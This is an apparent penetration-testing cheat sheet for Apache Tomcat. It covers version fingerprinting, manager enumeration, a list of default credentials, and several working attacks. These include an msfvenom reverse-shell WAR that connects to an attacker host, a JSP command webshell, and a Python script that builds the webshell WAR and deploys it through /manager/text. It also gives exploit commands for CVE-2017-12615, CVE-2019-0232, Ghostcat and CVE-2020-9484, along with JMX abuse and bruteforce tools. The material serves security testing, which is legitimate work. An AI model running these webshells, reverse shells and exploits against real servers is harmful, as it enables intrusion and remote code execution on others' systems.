# Tomcat

Apache Tomcat security testing - enumeration, default credentials, manager exploitation, and common CVEs.

## Enumeration

### Version Detection

```bash
# Default error page (ErrorReportValve) names the exact build unless showServerInfo="false"
curl -s https://target.com/nonexistent | grep -o 'Apache Tomcat/[0-9.]*[A-Za-z0-9.-]*'

# Server header: "Apache-Coyote/1.1" on older builds confirms Tomcat but hides the version
curl -sI https://target.com | grep -i '^Server:'

# Bundled documentation and release notes state the version in clear text
curl -s https://target.com/docs/ | grep -o '<title>[^<]*'
curl -s https://target.com/RELEASE-NOTES.txt | head -n 5
```

### Default Paths

```bash
# Manager webapp (each interface needs its own role in tomcat-users.xml)
/manager/html          # Web Application Manager, role manager-gui (form upload needs the CSRF nonce)
/manager/text          # Text interface, role manager-script (what curl and Metasploit use)
/manager/jmxproxy      # JMX proxy, role manager-jmx
/manager/status        # Server status, role manager-status (any manager-* role can view it)
/host-manager/html     # Virtual Host Manager, role admin-gui

# Admin console (older versions)
/admin/

# Status page
/status

# 401 = manager deployed and asking for credentials; 403 = deployed but the
# RemoteAddrValve/RemoteCIDRValve in the manager's context.xml rejects your IP
# (localhost only by default since 8.5) or the account lacks the role;
# 404 = the manager webapp was removed.
```
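The fingerprinting and manager-path checks above, as an added example that is not part of the page or any Tomcat tooling. It uses only the standard library; the target URL is whatever the caller passes, and the sample error-page HTML and `Server` header values in the usage are constructed. The status classification encodes the 401/403/404 distinction from the comment above.

```python
"""Tomcat enumeration helper: fingerprint the version and classify manager paths.

Added example, not the page's own tooling. urllib keeps it dependency-free;
the base URL is an assumption supplied on the command line.
"""
import re
import urllib.error
import urllib.request

# Paths from the page; the value is the role Tomcat expects for each one
MANAGER_PATHS = {
    "/manager/html": "manager-gui",
    "/manager/text": "manager-script",
    "/manager/jmxproxy": "manager-jmx",
    "/manager/status": "manager-status",
    "/host-manager/html": "admin-gui",
}

# Matches "Apache Tomcat/9.0.30" and milestone builds like "Apache Tomcat/9.0.0.M26"
VERSION_RE = re.compile(r"Apache Tomcat/(\d+\.\d+\.\d+(?:[.\-][\w.]+)?)")


def parse_version(body, server_header=""):
    """Pull the version out of an ErrorReportValve page (or the /docs/ index).

    The Server header alone is not enough: older builds send
    'Apache-Coyote/1.1', which says Tomcat but not which one.
    """
    m = VERSION_RE.search(body)
    if m:
        return m.group(1)
    if "coyote" in server_header.lower():
        return "unknown (Coyote connector, version hidden)"
    return None


def classify(status):
    """Map the HTTP status on a manager path to what it tells the tester."""
    if status == 401:
        return "present, needs credentials"
    if status == 403:
        return "present, blocked (RemoteAddrValve/RemoteCIDRValve or account lacks the role)"
    if status == 404:
        return "absent (manager webapp removed)"
    if status == 200:
        return "reachable without auth"
    return "other (%d)" % status


def fetch(url, timeout=10):
    """Return (status, Server header, body); 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode(), resp.headers.get("Server", ""), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Server", ""), e.read().decode("utf-8", "replace")


def probe(base):
    """Fingerprint from a guaranteed-404 page, then check each manager path."""
    base = base.rstrip("/")
    result = {"paths": {}}
    _, server, body = fetch(base + "/nonexistent-" + "x" * 8)
    result["version"] = parse_version(body, server)
    result["server_header"] = server
    for path, role in MANAGER_PATHS.items():
        status, _, _ = fetch(base + path)
        result["paths"][path] = {"status": status, "meaning": classify(status), "role": role}
    return result


if __name__ == "__main__":
    import json
    import sys
    print(json.dumps(probe(sys.argv[1]), indent=2))
```

Run it as `python3 tomcat_probe.py https://target.com`; a 403 on `/manager/html` together with a 401 on `/manager/text` is the usual sign of the default `RemoteAddrValve`, which only guards the HTML interface's context if that is how the valve was scoped, so check both before concluding the manager is unreachable.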

### Example Applications (often left enabled)

```bash
# The examples webapp ships in every Tomcat distribution (still present in 9.x and 10.x)
# and discloses server details; it is meant to be removed in production. Paths below use
# the classic layout; from Tomcat 6 onward the servlet examples answer under
# /examples/servlets/servlet/<Name> instead of /examples/servlet/<Name>
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp        # Shows server info, headers
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html  # Also handy for session-handling tests
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample   # Lets you set session attributes; check for fixation
/tomcat-docs/appdev/sample/web/hello.jsp
```

## Default Credentials

```
# Common default credentials for Tomcat Manager
admin:admin
admin:password
admin:tomcat
tomcat:tomcat
tomcat:s3cret
manager:manager
role1:role1
root:root
both:tomcat
admin:changethis
```

### Credentials Location

```bash
# Tomcat users configuration (world-readable more often than it should be once you have a shell)
$CATALINA_HOME/conf/tomcat-users.xml
/etc/tomcat/tomcat-users.xml           # distro packages: also /etc/tomcat8, /etc/tomcat9
/var/lib/tomcat8/conf/tomcat-users.xml
/opt/tomcat/conf/tomcat-users.xml

# Example tomcat-users.xml content. The roles decide which interface the account can use:
# manager-gui alone gives /manager/html but NOT /manager/text (that needs manager-script).
# Passwords may be stored hashed when a CredentialHandler is configured in the Realm.
<user username="admin" password="admin" roles="manager-gui,admin-gui"/>
```

## Manager Exploitation

### WAR File Deployment (RCE)

```bash
# Generate a WAR with a reverse-shell JSP (start a listener first: nc -lvnp 4444)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker LPORT=4444 -f war > shell.war

# Deploy via curl (PUT to the text interface; needs the manager-script role,
# a manager-gui-only account gets 403 here and has to use the HTML form or
# Metasploit's tomcat_mgr_upload, which handles the form's CSRF nonce)
curl -u 'tomcat:tomcat' --upload-file shell.war \
  "https://target.com/manager/text/deploy?path=/shell"

# Alternative: deploy a WAR that is already on the SERVER's filesystem
curl -u 'tomcat:tomcat' \
  "https://target.com/manager/text/deploy?war=file:/path/to/shell.war&path=/shell"

# Access shell (the msfvenom JSP has a random name; unzip -l shell.war shows it
# if requesting the context root does not trigger it)
curl https://target.com/shell/

# Undeploy when done (leaving the context behind is a finding against you)
curl -u 'tomcat:tomcat' "https://target.com/manager/text/undeploy?path=/shell"
```

### Manual JSP Webshell

```jsp
<%@ page import="java.io.*" %>
<%
// Usage: /shell/cmd.jsp?cmd=id  (Runtime.exec splits on whitespace: no pipes or quoting)
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    // BufferedReader replaces the deprecated DataInputStream.readLine()
    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = br.readLine()) != null) {
        out.println(line);
    }
    // stderr is a separate stream; print it too so a failing command is visible
    br = new BufferedReader(new InputStreamReader(p.getErrorStream()));
    while ((line = br.readLine()) != null) {
        out.println(line);
    }
    p.waitFor();
}
%>
```
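The WAR deployment and manual JSP shell above, folded into one added example that is not the page's code, Tomcat's, or Metasploit's. It packages the command JSP into a WAR in memory with `zipfile` (no `jar` or `msfvenom` needed), adds a `web.xml` that makes the JSP the welcome file so `GET /shell/` hits it without knowing the file name, and talks to `/manager/text` with `urllib`. Base URL, credentials and context path are assumptions the caller supplies, and the account must hold `manager-script`.

```python
"""Build a JSP-webshell WAR and deploy it through the manager text interface.

Added example, not the page's code. Assumes manager-script credentials;
base URL, user, password and context path come from the caller.
"""
import base64
import io
import urllib.error
import urllib.request
import zipfile

# Same idea as the manual JSP shell above, compacted; stdout and stderr both printed
CMD_JSP = r'''<%@ page import="java.io.*" %>
<% String c = request.getParameter("cmd");
if (c != null) {
    Process p = Runtime.getRuntime().exec(c);
    for (InputStream s : new InputStream[]{p.getInputStream(), p.getErrorStream()}) {
        BufferedReader r = new BufferedReader(new InputStreamReader(s));
        String l; while ((l = r.readLine()) != null) out.println(l);
    }
} %>'''

# welcome-file makes the context root serve the shell, so the JSP name need not be guessed
WEB_XML = '''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list><welcome-file>{jsp}</welcome-file></welcome-file-list>
</web-app>'''


def build_war(jsp_source=CMD_JSP, jsp_name="cmd.jsp"):
    """Return WAR bytes: the JSP at the archive root plus WEB-INF/web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(jsp_name, jsp_source)
        z.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
    return buf.getvalue()


def war_contents(war_bytes):
    """Map member name -> bytes; confirm the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return {name: z.read(name) for name in z.namelist()}


def _manager(base, user, password, query, data=None, method="GET"):
    """One request against /manager/text/<query> with HTTP Basic auth."""
    url = base.rstrip("/") + "/manager/text/" + query
    req = urllib.request.Request(url, data=data, method=method)
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    if data is not None:
        req.add_header("Content-Type", "application/octet-stream")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        # 401 = wrong credentials; 403 = account lacks manager-script (GUI-only user)
        return "HTTP %d: %s" % (e.code, e.read().decode(errors="replace"))


def deploy(base, user, password, war_bytes, context="/shell"):
    """PUT the WAR to deploy?path=<context>; the reply starts with
    'OK - Deployed application at context path' on success."""
    return _manager(base, user, password, "deploy?path=" + context, data=war_bytes, method="PUT")


def undeploy(base, user, password, context="/shell"):
    """Remove the context again when the engagement step is done."""
    return _manager(base, user, password, "undeploy?path=" + context)


if __name__ == "__main__":
    import sys
    base, user, pw = sys.argv[1:4]
    war = build_war()
    print(sorted(war_contents(war)))
    print(deploy(base, user, pw, war))
    print("then: curl '%s/shell/?cmd=id'" % base.rstrip("/"))
```

The manager returns a `FAIL - ...` line rather than an HTTP error for most deployment problems (context already exists, unparsable WAR), so read the body, not just the status code, and always run `undeploy` before closing out.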

## Common CVEs

### CVE-2017-12615 (PUT Method RCE)

```bash
# CVE-2017-12615: Tomcat 7.0.0 - 7.0.79 on Windows. The cross-platform follow-up
# CVE-2017-12617 covers 7.0.0-7.0.81, 8.0.0-8.0.46, 8.5.0-8.5.22 and 9.0.0.M1-9.0.0.
# Both need the DefaultServlet's "readonly" init-param set to false in conf/web.xml
# (default true). A plain PUT to shell.jsp is refused because JSPs are not the
# DefaultServlet's; the suffix tricks below dodge that check and the file is still
# saved as shell.jsp.

# Upload JSP via PUT (use --data-binary or --upload-file so newlines in a real shell survive)
curl -X PUT "https://target.com/shell.jsp/" --data-binary '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'
curl -X PUT "https://target.com/shell.jsp%20" --data-binary '<% ... %>'  # Space bypass
curl -X PUT "https://target.com/shell.jsp::$DATA" --data-binary '<% ... %>'  # NTFS stream (Windows only)

# The one-liner above runs ?cmd= but prints nothing back; use the full webshell
# above, or a callback command, to confirm execution
```

### CVE-2019-0232 (CGI RCE)

```bash
# Tomcat on Windows with the CGI servlet enabled (it is commented out in conf/web.xml
# by default) and enableCmdLineArguments=true, which was the default before
# 9.0.18 / 8.5.40 / 7.0.94. Query-string arguments reach cmd.exe unescaped, so any
# .bat/.cmd in the cgi-bin directory becomes a command-injection primitive.

curl "https://target.com/cgi-bin/test.bat?&whoami"
# URL-encode spaces and backslashes in the injected command, e.g. ?&dir+c%3A%5C
```

### CVE-2020-1938 (Ghostcat - AJP)

```bash
# Affects Tomcat 6.x (EOL, never fixed), 7.x < 7.0.100, 8.5.x < 8.5.51, 9.x < 9.0.31
# whenever the AJP connector (8009/tcp, enabled in older default server.xml) is reachable.
# AJP request attributes can set javax.servlet.include.*, so the DefaultServlet reads
# any file under the WEBAPP ROOT (WEB-INF/web.xml, classes, properties with creds);
# it does not reach arbitrary OS files.

# Check if AJP port open
nmap -p 8009 target.com

# Exploit (the URL only supplies the host; traffic goes to the AJP port, not HTTPS)
# https://github.com/AhmedMohamedDev/CNVD-2020-10487-Tomcat-Ajp-lfi
python ajpShooter.py https://target.com 8009 /WEB-INF/web.xml read

# For RCE, first get a file into the webroot (an upload feature in the application),
# then have the JspServlet compile it as a JSP
python ajpShooter.py https://target.com 8009 /shell.txt eval
```

### CVE-2020-9484 (Deserialization)

```bash
# Session-persistence deserialization. Affects 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34,
# 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103. Needs all of:
#   - PersistentManager with a FileStore configured in context.xml (not the default setup)
#   - a deserialization gadget library (e.g. Commons Collections) on the classpath
#   - a file you control on the server, at a path you know, readable by the Tomcat user
# Tomcat appends ".session" to the cookie value and opens it relative to the FileStore
# directory without checking for path traversal.

# Craft malicious session (ysoserial writes the serialized object to stdout)
java -jar ysoserial.jar CommonsCollections2 'id' > /path/session.session

# Trigger via Cookie (traversal is relative to the FileStore directory; adjust the depth)
curl -H "Cookie: JSESSIONID=../../path/session" https://target.com/
```

## JMX Exploitation

```bash
# Two JMX surfaces on a Tomcat host:

# 1. Remote JMX over RMI, if the JVM was started with -Dcom.sun.management.jmxremote.port=N
#    and -Dcom.sun.management.jmxremote.authenticate=false. Connect with jconsole, or
#    load an MLet that registers a malicious MBean for RCE
#    (Metasploit: exploit/multi/misc/java_jmx_server)
jconsole target.com:N

# 2. The manager's HTTP JMX proxy (role manager-jmx): query, read, write and invoke
#    MBeans over plain GET requests, no RMI needed
curl -u 'tomcat:tomcat' "https://target.com/manager/jmxproxy/?qry=*:*"
curl -u 'tomcat:tomcat' "https://target.com/manager/jmxproxy/?get=java.lang:type=Runtime&att=ClassPath"
curl -u 'tomcat:tomcat' "https://target.com/manager/jmxproxy/?set=BEANNAME&att=ATTRIBUTE&val=VALUE"
curl -u 'tomcat:tomcat' "https://target.com/manager/jmxproxy/?invoke=BEANNAME&op=OPERATION&ps=PARAM1,PARAM2"
```

## AJP Protocol Testing

```bash
# Nmap AJP scripts (ajp-headers and ajp-request also exist for raw requests)
nmap -sV -p 8009 --script ajp-auth,ajp-methods,ajp-headers target.com

# AJP request (proxies an HTTP-style request through the AJP connector, which
# sits behind no authentication of its own)
# https://github.com/AhmedMohamedDev/ajp-client
python3 ajp_client.py target.com 8009 /manager/html
```

## Tools

```bash
# Tomcat bruteforce
# https://github.com/AhmedMohamedDev/tomcat-manager-bruteforce
python3 tomcat_bruteforce.py -U https://target.com/manager/html

# Metasploit
use auxiliary/scanner/http/tomcat_mgr_login
use exploit/multi/http/tomcat_mgr_deploy   # text interface, needs manager-script
use exploit/multi/http/tomcat_mgr_upload   # HTML form, works with manager-gui only

# Nuclei (Ghostcat is an AJP check, so its template is a network template, not an http one)
nuclei -id CVE-2020-1938 -u target.com:8009
nuclei -tags tomcat -u https://target.com
```

## Related Topics

* [Web Shells](/enumeration/web/web-shells.md) - JSP shells
* [Deserialization](/enumeration/web/deserialization.md) - Java deserialization
* [Reverse Shells](/exploitation/reverse-shells.md)

